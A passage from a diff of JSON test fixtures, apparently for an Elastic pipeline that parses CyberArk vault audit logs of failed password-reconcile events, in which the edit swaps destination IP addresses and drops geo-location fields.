Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403100500Z", + "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -847,17 +774,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -877,7 +795,7 @@ }, "@timestamp": "2021-03-15T13:04:27.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -889,27 +807,27 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-15T13:04:27Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -922,7 +840,7 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615813465" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -936,8 +854,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176787Z", - "original": "\u003c7\u003e1 2021-03-15T13:04:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:04:27\",\"IsoTimestamp\":\"2021-03-15T13:04:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403105900Z", + "original": "\u003c7\u003e1 2021-03-15T13:04:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:04:27\",\"IsoTimestamp\":\"2021-03-15T13:04:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -965,17 +883,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -995,7 +904,7 @@ }, "@timestamp": "2021-03-15T14:44:37.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1007,21 +916,21 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-15T14:44:37Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n 